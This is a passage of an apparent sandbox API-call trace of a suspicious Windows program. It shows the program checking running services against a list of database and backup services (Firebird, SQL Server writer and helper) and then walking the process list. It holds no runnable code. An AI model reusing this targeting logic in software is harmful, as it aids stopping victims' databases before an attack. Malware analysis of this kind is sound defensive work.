(lpString="SecurityHealthService") returned 21 [0072.156] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0072.157] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0072.157] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0072.157] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0072.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0072.157] lstrlenW (lpString="SENS") returned 4 [0072.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0072.157] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0072.157] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0072.157] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0072.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0072.157] lstrlenW (lpString="ShellHWDetection") returned 16 [0072.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0072.157] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0072.157] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0072.157] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0072.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0072.157] lstrlenW (lpString="Spooler") returned 7 [0072.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0072.157] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0072.157] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0072.157] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0072.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0072.157] lstrlenW (lpString="SSDPSRV") returned 7 [0072.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0072.157] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0072.157] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0072.157] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0072.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0072.157] lstrlenW (lpString="StateRepository") returned 15 [0072.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0072.157] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0072.157] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0072.157] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0072.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0072.157] lstrlenW (lpString="SysMain") returned 7 [0072.158] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0072.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0072.158] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0072.158] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0072.158] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3cd2e68 | out: hHeap=0x5d0000) returned 1 [0072.158] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0072.162] Process32FirstW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.162] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0072.163] lstrlenW (lpString="System") returned 6 [0072.163] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0072.164] lstrlenW (lpString="smss.exe") returned 8 [0072.164] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0072.164] lstrlenW (lpString="csrss.exe") returned 9 [0072.164] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0072.165] lstrlenW (lpString="wininit.exe") returned 11 [0072.165] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0072.166] lstrlenW (lpString="csrss.exe") returned 9 [0072.166] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0072.167] lstrlenW (lpString="winlogon.exe") returned 12 [0072.167] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0072.167] lstrlenW (lpString="services.exe") returned 12 [0072.167] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0072.168] lstrlenW (lpString="lsass.exe") returned 9 [0072.168] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.169] lstrlenW (lpString="svchost.exe") returned 11 [0072.169] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0072.169] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0072.169] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0072.170] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0072.170] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.171] lstrlenW (lpString="svchost.exe") returned 11 [0072.171] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0072.172] lstrlenW (lpString="dwm.exe") returned 7 [0072.172] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x53, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.172] lstrlenW (lpString="svchost.exe") returned 11 [0072.172] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.173] lstrlenW (lpString="svchost.exe") returned 11 [0072.173] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.174] lstrlenW (lpString="svchost.exe") returned 11 [0072.174] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.174] lstrlenW (lpString="svchost.exe") returned 11 [0072.174] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.175] lstrlenW (lpString="svchost.exe") returned 11 [0072.175] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.176] lstrlenW (lpString="svchost.exe") returned 11 [0072.176] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.177] lstrlenW (lpString="svchost.exe") returned 11 [0072.177] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.177] lstrlenW (lpString="svchost.exe") returned 11 [0072.177] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.178] lstrlenW (lpString="svchost.exe") returned 11 [0072.178] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0072.179] lstrlenW (lpString="spoolsv.exe") returned 11 [0072.179] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.179] lstrlenW (lpString="svchost.exe") returned 11 [0072.179] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.180] lstrlenW (lpString="svchost.exe") returned 11 [0072.180] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0072.181] lstrlenW (lpString="audiodg.exe") returned 11 [0072.181] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0072.181] lstrlenW (lpString="sihost.exe") returned 10 [0072.182] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.182] lstrlenW (lpString="svchost.exe") returned 11 [0072.182] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0072.183] lstrlenW (lpString="taskhostw.exe") returned 13 [0072.183] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0072.184] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0072.184] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0072.184] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0072.184] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0072.185] lstrlenW (lpString="explorer.exe") returned 12 [0072.185] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0072.186] lstrlenW (lpString="Memory Compression") returned 18 [0072.186] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0072.187] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0072.187] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0072.187] lstrlenW (lpString="SearchUI.exe") returned 12 [0072.187] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0072.188] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0072.188] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0072.189] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0072.189] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0072.190] lstrlenW (lpString="taskhostw.exe") returned 13 [0072.190] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0072.190] lstrlenW (lpString="UsoClient.exe") returned 13 [0072.190] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0072.191] lstrlenW (lpString="taskhostw.exe") returned 13 [0072.191] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0072.192] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0072.192] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0072.192] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0072.192] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0072.193] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0072.193] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0072.194] lstrlenW (lpString="screensaver.exe") returned 15 [0072.194] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0072.194] lstrlenW (lpString="xml upper.exe") returned 13 [0072.194] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0072.195] lstrlenW (lpString="defeat preston.exe") returned 18 [0072.195] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0072.196] lstrlenW (lpString="boss isolated.exe") returned 17 [0072.196] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0072.197] lstrlenW (lpString="member.exe") returned 10 [0072.197] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0072.197] lstrlenW (lpString="chubby-er.exe") returned 13 [0072.197] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0072.198] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0072.198] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0072.199] lstrlenW (lpString="organization.exe") returned 16 [0072.199] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0072.199] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0072.199] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0072.200] lstrlenW (lpString="spray-roman.exe") returned 15 [0072.200] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0072.202] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0072.203] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0072.203] lstrlenW (lpString="tank attacks.exe") returned 16 [0072.203] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0072.204] lstrlenW (lpString="wires jacket.exe") returned 16 [0072.204] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0072.205] lstrlenW (lpString="values.exe") returned 10 [0072.205] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0072.206] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0072.206] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0072.206] lstrlenW (lpString="printersaerospace.exe") returned 21 [0072.206] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0072.207] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0072.207] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0072.208] lstrlenW (lpString="dllhost.exe") returned 11 [0072.208] Process32NextW (in: hSnapshot=0x358, lppe=0x258fd2c | out: 